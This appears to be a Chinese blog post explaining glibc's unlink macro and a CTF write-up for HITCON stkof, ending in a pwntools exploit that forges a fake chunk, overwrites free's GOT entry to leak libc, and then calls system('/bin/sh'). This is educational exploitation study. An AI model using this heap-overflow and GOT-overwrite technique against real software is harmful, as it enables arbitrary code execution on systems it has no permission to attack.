unlink(1)

最新推荐文章于 2026-06-20 16:52:53 发布
原创 最新推荐文章于 2026-06-20 16:52:53 发布 · 466 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
标签
#pwn #c语言 #堆栈 #unlink #堆溢出
本文详细解析了C语言中unlink函数在处理堆链表时的机制,通过一个HITCON挑战题为例,展示了如何利用堆溢出和unlink来修改内存中的数据。通过构造特定的chunk和满足unlink条件,实现了对全局变量s1数组的修改,最终达到执行自定义代码的目的。

unlink是对双向堆链表进行操作的(largebin和smallbin),它对发生在堆合并之后

unlink

测试代码如下:

#include <stdio.h>
#include <stdlib.h>
int main()
{
	void *a = malloc(0x10);
	void *chunk1 = malloc(0x80);
	void *b = malloc(0x10);
	void *chunk2 = malloc(0x80);
	void *chunk3 = malloc(0x80);
	void *c = malloc(0x10);
	void *chunk4 = malloc(0x80);
	void *d = malloc(0x10);

	free(chunk1);
	free(chunk2);
	free(chunk4);
	free(chunk3);
	return 0;
}

接下来,编译好之后,在free(chunk3)处打一个断点,然后执行,查看堆状态
在这里插入图片描述可以看到chunk1、chunk2、chunk4已经构成了链表,如下
在这里插入图片描述此时chunk2与前后构成了双向链表,但目前并没有出发unlink,那么需要执行后面的free(chunk3),让chunk2和chunk3合并,改变chunk大小后,就会触发unlink机制了。
接着执行完free(chunk3),查看堆状态
在这里插入图片描述结构图如下
在这里插入图片描述由此可见,chunk1、chunk3都修改了对应的指针,而chuunk2与chunk3合并。
来看一下unlink的源码

#define unlink(AV, P, BK, FD) {                                            
            if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      
              malloc_printerr ("corrupted size vs. prev_size");                              
            FD = P->fd;                                                                      
            BK = P->bk;                                                                      
            if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                      
              malloc_printerr ("corrupted double-linked list");                              
            else {                                                                      
                FD->bk = BK;                                                              
                BK->fd = FD;                                                              
                if (!in_smallbin_range (chunksize_nomask (P))                             
                    && __builtin_expect (P->fd_nextsize != NULL, 0)) {                      
                    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)              
                        || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    
                      malloc_printerr ("corrupted double-linked list (not small)");   
                    if (FD->fd_nextsize == NULL) {                                      
                        if (P->fd_nextsize == P)                                      
                          FD->fd_nextsize = FD->bk_nextsize = FD;                      
                        else {                                                              
                            FD->fd_nextsize = P->fd_nextsize;                              
                            FD->bk_nextsize = P->bk_nextsize;                              
                            P->fd_nextsize->bk_nextsize = FD;                              
                            P->bk_nextsize->fd_nextsize = FD;                              
                          }                                                              
                      } else {                                                              
                        P->fd_nextsize->bk_nextsize = P->bk_nextsize;                      
                        P->bk_nextsize->fd_nextsize = P->fd_nextsize;                      
                      }                                                                                   }                                                                      \
              }                                                                              
        }

unlink要执行成功,至少需要使得前两个if条件得到满足
FD->bk == P || BK->fd == P
chunksize( P) == prev_size (next_chunk( P))

例子

HITCON stkof
保护如下
在这里插入图片描述
先分析一下有用的函数

  • add函数
    在这里插入图片描述

该函数用于创建chunk,并将chunk的地址给s1数组,同时i是一个全局变量,因此add只能一直向后填充数组

  • edit函数
    在这里插入图片描述

用于向chunk写入数据,但存在一个堆溢出,因为没有对写入数据的大小进行限制

  • delete函数
    在这里插入图片描述

释放堆,同时将数组对应处归0,因此无法double free

目前能够知道,在edit函数中,存在堆溢出,可以利用它对后面的堆进行修改
那么在这里如何利用unlink来解题?说实话,没有看着题之前还真不知道unlik能干嘛

首先,unlink能够修改fd、bk指针,目前能够使用的是edit函数,希望通过它进行地址写,就需要修改s1数组的值,要能够修改这个值,首先s1数组就得构造成符合unlink进行的条件,也就是FD->bk == P || BK->fd == P,因此需要把s1数组看作一个chunk
由于unlink并不会检测前后两个chunk是不是真的chunk,只对fd、bk进行了判断,因此只要伪造一个空闲堆,它的fd、bk是指向s1的某个地址,并且能够满足上面那个等式,就可以将s1数组中的两个值修改成这个数组的某个元素的地址

先构造3个chunk,并查看s1数组
在这里插入图片描述
把这一部分看作chunk,那么fd=0x24d8450,bk=0x24d8490
再看看s1 - 8处
在这里插入图片描述
fd=0x24d8420,bk=0x24d8450
此时就能够满足FD->bk == P || BK->fd == P
那么现在只需要构造一个fd = 0x602138,bk=0x602140的空闲chunk,并与它后面的chunk合并,就能够触发unlink
之后0x602150处的值先修改为0x602140,然后被修改为0x602138,如下
在这里插入图片描述
那么,我们就可以对s1[2]指向的地址s1[-1]进行写操作了,写入可写的地址,就能够对该地址进行写操作了。

过程

首先,构造chunk并触发unlink

add(0x8) #chunk0

add(0x30) #chunk1
add(0x80) #chunk2
arry = 0x602140
payload = p64(0) + p64(0x30) + p64(arry - 0x8) + p64(arry) + p64(0x0) + p64(0) + p64(0x30) + p64(0x90)
edit(2, len(payload), payload)
free(3)
p.recvuntil(b'OK\n')

由于没有进行setbuf操作,在初次使用fgets和printf函数时,会申请堆空间,因此第一个add(0x8)利用不了,需要在申请两个堆

由于需要触发unlink,因此需要能够合并,那么free chunk需要是在unsortedbin中,因此对chunk2开辟0x80
伪造的堆至少需要0x30大小,在伪造的同时需要修改chunk3的prev_size和size字段,保证与伪造的chunk大小一致,且证明它是个空闲chunk

接下来就可以通过edit[2]来修改这个数组,先将free的got表修改为puts的plt,从而调用puts函数。

payload = p64(0) + p64(elf.got['free']) + p64(elf.got['puts'])
edit(2, len(payload), payload)
edit(0, 8, p64(elf.plt['puts']))
free(1)
puts_addr = u64(p.recv(6).ljust(8, b'\x00'))
libc_base = puts_addr - libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = next(libc.search(b'/bin/sh')) + libc_base

这里对s1[2]进行写时,实际上是从s1[-1]处对数组进行了修改,我让s1[-1] = 0,s1[0]=free_got,
s1[1] = puts_got
然后修改s1[0],去修改free的got表,之后在free(1),就能打印处puts的地址了

那么最后就是调用system函数了

payload = p64(0) + p64(elf.got['free']) + p64(binsh)
edit(2, len(payload), payload)
edit(0, 8, p64(system))
free(1)
p.interactive()

最后

unlink机制理解起来还是很简单,这题也让我明白,有时候伪造的堆不一定真的是堆
我这里是为自己学习做记录,如果看不明白可以看看这位大佬写的文章

zctf_2016_note3
Tw0的博客
03-16 268
heap中的unlink攻击是比较常用的技巧。后向的unlink利用条件更加简单,只需要off-by-null即可。但是前向的unlink因为需要设置伪造chunk的size,所以利用条件稍微困难一些,需要off-by-one才能实现。
堆溢出unlink_地址任意写
zhuo1358的博客
09-15 1071
我们先来回顾一下堆方面的基础知识,我们知道,当我们free一个大小超过0x90的chunk时,会检查这个chunk物理意义上相邻的前一个chunk是否是空闲状态,如果是,两个chunk会合并成一个大的chunk来合理利用空间。这里的p64(0x30)是下一个chunk的pre_size域,p64(0x90)是下一个chunk的大小,目的是为了触发unlink和绕过检查(只有一个大于0x80的chunk释放时才会触发unlink):检查与被释放chunk相邻高地址的chunk的size的P标志位是否为0。
unsafe_unlink(详解)
m0_52249553的博客
04-07 547
how2heap调试
coreutils8.32 unlink命令和源码分析
null
09-23 399
unlink命令和源码分析
堆利用学习之unlink
Hpasserby的博客
10-03 645
原理 unlink是内存操作中的一个宏, 用来从双向链表中取出一个free chunk,其过程中的指针操作存在任意写的漏洞。 源码: /* Take a chunk off a bin list */ // unlink p #define unlink(AV, P, BK, FD) { // 由于 ...
Linux下堆溢出利用1-unlink基本原理
haibiandaxia的博客
08-08 1219
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成asdfffffsdfsafasf如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的
linux unlink 函数,linux – unlink和rm有什么区别?
weixin_39609483的博客
05-07 690
两者都是同一基本函数的包装器,它是一个unlink()系统调用.权衡用户土地利用率之间的差异.RM(1):>更多选择.>更多反馈.>理智检查.>由于上述原因,单个呼叫的速度会慢一些.>可以同时使用多个参数调用.(1)取消关联:>减少健全性检查.>无法删除目录.>无法递归.>一次只能拿一个参数.>由于它的简单性,在单个呼叫方面更加精简.&g...
gnu coreutils4.5.1 unlink.c源码解读
woshiyilitongdouzi的博客
03-04 210
这个命令的代码真短。核心意思是 if (unlink (argv[1]) != 0)    error (EXIT_FAILURE, errno, _("cannot unlink %s"), quote (argv[1]));其中对--的处理,让我很是纠结,没看懂 if (1 &lt; argc &amp;&amp; STREQ (argv[1], "--"))    {      --argc...
linux 删除文件myfile1,Linux unlink函数和删除文件的操作方法
weixin_29015801的博客
04-28 639
1. unlink函数对于硬链接来说,unlink 用来删除目录项,并把 inode 引用计数减 1,这两步也是一个原子过程。直到 inode 引用计数为 0,才会真正删除文件。对于软链接来说,unlink 直接删除软链接,而不影响软链接指向的文件。函数原型:int unlink(const char *pathname);参数说明:pathname:指定要移除的链接文件返回值说明:成功返回0;失...
Unlink
kelxLZ的博客
07-03 1827
Author:ZERO-A-ONE Date:2021-07-03 一、unlink的原理 简介:俗称脱链,就是将链表头处的free堆块unsorted bin中脱离出来然后和物理地址相邻的新free的堆块合并成大堆块(向前合并或者向后合并),再放入到unsorted bin中 危害原理:通过伪造free状态的fake_chunk,伪造fd指针和bk指针,通过绕过unlink的检测实现unlinkunlink就会往p所在的位置写入p-0x18,从而实现任意地址写的漏洞 漏洞产生原因:off.
Redis(四):del/unlink 命令源码解析
终极冥帝
01-27 1225
  上一篇文章从根本上理解了set/get的处理过程,相当于理解了 增、改、查的过程,现在就差一个删了。本篇我们来看一下删除过程。   对于客户端来说,删除操作无需区分何种数据类型,只管进行 del 操作即可。 零、删除命令 del 的定义   主要有两个: del/unlink, 差别是 unlink 速度会更快, 因为其使用了异步删除优化模式, 其定义如下: // 标识...
C 语言unlink 函数
黑夜中的斗狼
09-02 1242
相关函数:link, rename, remove 头文件:#include 定义函数:int unlink(const char * pathname); 函数说明:unlink()会删除参数pathname 指定的文件. 如果该文件名为最后连接点, 但有其他进程打开了此文件, 则在所有关于此文件的文件描述词皆关闭后才会删除. 如果参数pathname 为一符号连接, 则此连
unlink学习
weixin_45427676的博客
04-14 671
unlink原理 unlink这种利用方式源于glibc堆管理的一种特性,即当free一个chunk时,若该chunk处于双向链表中,则会检测其相邻块是否空闲,若处于空闲状态,则会将该空闲块从双向链表中取出,然后合并,这个取出操作就是unlinkunlink其实就是删除双向链表中的目标结点,这个删除过程本质上是对其前后结点的指针重新赋值,若我们对其指针进行巧妙的设置,则可能控制任意内存地址空间,...
好好说话之unlink
hollk’s blog
09-17 7915
堆溢出的第三部分unlink,这可能是有史以来我做的讲解图最多的一篇文章了~~累死~~ 。可能做pwn的人都应该听过unlink,见面都要说声久仰久仰。学unlink的时候走了一些弯路,也是遇到了很多困扰的问题,会在后面的内容中做出标注。由于写的比较详细,所以字数依然还是一如既往的多,我会在适当的时候提醒向前回顾某一处知识点,也希望在看例题的时候能够跟着一起做一下 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)
Linux中link,unlink,close,fclose详解
LiuX
04-03 9460
每一个文件,都可以通过一个struct stat的结构体来获得文件信息,其中一个成员st_nlink代表文件的链接数。 struct stat {                dev_t     st_dev;     /* ID of device containing file */                ino_t     st_ino;     /* inode numbe
C语言线程API列表
最新发布
万法若空
06-20 202
pthread库提供了完整的POSIX线程API,主要分为线程管理(创建/终止/控制)、同步机制(互斥锁/条件变量/读写锁/屏障/自旋锁)、线程特定数据、清理处理程序和属性对象等类别。其中线程管理API包括pthread_create、pthread_join等核心函数;同步机制包含保护临界区的互斥锁、线程协调的条件变量等;属性对象则用于配置线程及同步对象的行为特征。所有pthread标识符均以"pthread_"为前缀,使用时需链接pthread库。这些API共同构成了多线程编程的基础
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值